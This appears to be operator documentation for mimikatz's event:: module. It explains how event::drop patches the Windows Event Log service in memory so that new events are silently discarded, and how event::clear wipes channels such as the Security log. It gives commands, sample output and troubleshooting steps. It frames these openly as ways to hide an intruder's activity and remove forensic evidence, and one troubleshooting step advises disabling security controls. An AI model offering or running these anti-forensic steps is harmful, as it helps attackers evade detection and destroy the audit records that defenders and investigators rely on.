event:: module documentation
The event:: module groups commands that interact with the Windows Event Log
service. Each command is summarized below with its purpose, available flags,
and guidance on when and why to use them.
| Command | Description |
|---|---|
event::drop |
Apply an in-memory patch to the Event Log service so that new events are silently discarded. |
event::clear |
Clear the contents of a specified Windows event log channel. |
event::dropPurpose: Temporarily patch the running Event Log service process so that it
returns immediately when attempting to persist new events. This prevents the
system from recording subsequent log entries while the patch is in place.
Syntax:
mimikatz # event::drop
Flags: None.
How it works:
Channel::ActualProcessEvent (or PerformWriteRequest on older systems).event::drop callskull_m_patch_genericProcessOrServiceFromBuild to apply the patch inside theEventLog service process (loading either eventlog.dll or wevtsvc.dllWhy use it: This is useful during offensive operations when you need to
prevent Windows from recording new security or application events that could
expose your activities. Because the patch intercepts event processing at the
service level, any component that relies on the standard logging pipeline will
quietly fail to persist events until the service is restarted or the system is
rebooted, reverting the patch.
Caution: The technique is experimental and invasive. Patching core services
can destabilize the system or trigger security controls. Always test in a lab
and be prepared to restart the Event Log service to restore normal logging.
Example usage:
mimikatz # privilege::debug
mimikatz # event::drop
"EventLog" service patched
Example output explanation: After elevating with privilege::debug,
"EventLog" service patched confirms that the byte pattern in
eventlog.dll/wevtsvc.dll was successfully replaced for the running
EventLog service.【F:modules/kull_m_patch.c†L93-L108】【F:mimikatz/modules/kuhl_m_event.c†L77-L80】
Potential errors and troubleshooting:
| Symptom | Likely cause | Mitigation |
|---|---|---|
Incorrect version in references |
The local Windows build does not match any of the hard-coded patch signatures. | Confirm the OS build number and update to a supported build or extend the signature table before retrying.【F:modules/kull_m_patch.c†L89-L117】 |
Service is not running |
The Event Log service is stopped, so there is no target process to patch. | Start the EventLog service (sc start eventlog) and rerun the command.【F:modules/kull_m_patch.c†L93-L115】 |
ERROR kuhl_m_service_getUniqueForName ; ... |
The service controller query failed—commonly due to insufficient rights. | Ensure you are running as an administrator with SeDebugPrivilege enabled before invoking event::drop.【F:modules/kull_m_patch.c†L93-L115】 |
ERROR OpenProcess (0x00000005) |
The tool could not open the Event Log process with read/write/operation permissions because the token lacks required privileges. | Re-run mimikatz with elevated rights and execute privilege::debug prior to event::drop to grant the handle access requested by OpenProcess.【F:modules/kull_m_patch.c†L97-L113】 |
ERROR kull_m_patch (0xC000...) |
Pattern search or memory write failed—often due to security products, unexpected module layouts, or unsupported builds. | Temporarily disable interfering security controls, verify module versions, and confirm the build is covered by the EventReferences table.【F:mimikatz/modules/kuhl_m_event.c†L17-L74】【F:modules/kull_m_patch.c†L99-L110】 |
event::clearPurpose: Clear all records from a specific Windows event log channel and
report the number of entries before and after the operation.【F:mimikatz/modules/kuhl_m_event.c†L83-L103】
Syntax:
mimikatz # event::clear [/log:<ChannelName>]
Flags:
| Flag | Description | Why use it |
|---|---|---|
/log:<ChannelName> |
Specifies which event log channel to open and clear. If omitted, the command defaults to the Security log.【F:mimikatz/modules/kuhl_m_event.c†L88-L99】 |
Targeting the right log ensures you only purge the records relevant to your operation. Overwriting the default prevents accidental clearing of the high-value Security log when you intend to manipulate another channel. |
How it works:
/log argument, defaulting toSecurity when the flag is not provided.【F:mimikatz/modules/kuhl_m_event.c†L88-L90】ClearEventLog to wipe the log and reports success or the encounteredWhy use it: Clearing an event log can remove forensic evidence of your
activities, especially when done immediately after executing noisy actions. The
command’s before/after counts give quick confirmation that the purge succeeded.
Be aware that clearing logs is itself an auditable event that defenders may
notice.
Example usage:
mimikatz # event::clear /log:Security
Using "Security" event log :
- 231 event(s)
- Cleared !
- 0 event(s)
Example output explanation: The command echoes the targeted channel, displays
the record count before clearing, confirms when ClearEventLog succeeds, and
prints the remaining records so you can verify the purge.【F:mimikatz/modules/kuhl_m_event.c†L88-L99】
Potential errors and troubleshooting:
| Symptom | Likely cause | Mitigation |
|---|---|---|
ERROR OpenEventLog (0x00000005) or ERROR OpenEventLog (0x00000002) |
Access denied or the channel name is invalid. | Run mimikatz from an elevated context for administrative channels, and double-check the /log:<ChannelName> value (e.g., Security, Application, Microsoft-Windows-TaskScheduler/Operational).【F:mimikatz/modules/kuhl_m_event.c†L88-L101】 |
ERROR ClearEventLog (0x00000005) |
The user lacks rights to clear the specified log. | Ensure the account is a local administrator or holds the SeSecurityPrivilege, and consider stopping log forwarding tools that may lock the channel.【F:mimikatz/modules/kuhl_m_event.c†L95-L98】 |
| Log count remains unchanged | Clearing failed silently (e.g., due to collectors regenerating events immediately). | Verify the channel is not archived-only, rerun the command, and inspect Windows Event Viewer for collector warnings indicating why events persist.【F:mimikatz/modules/kuhl_m_event.c†L93-L99】 |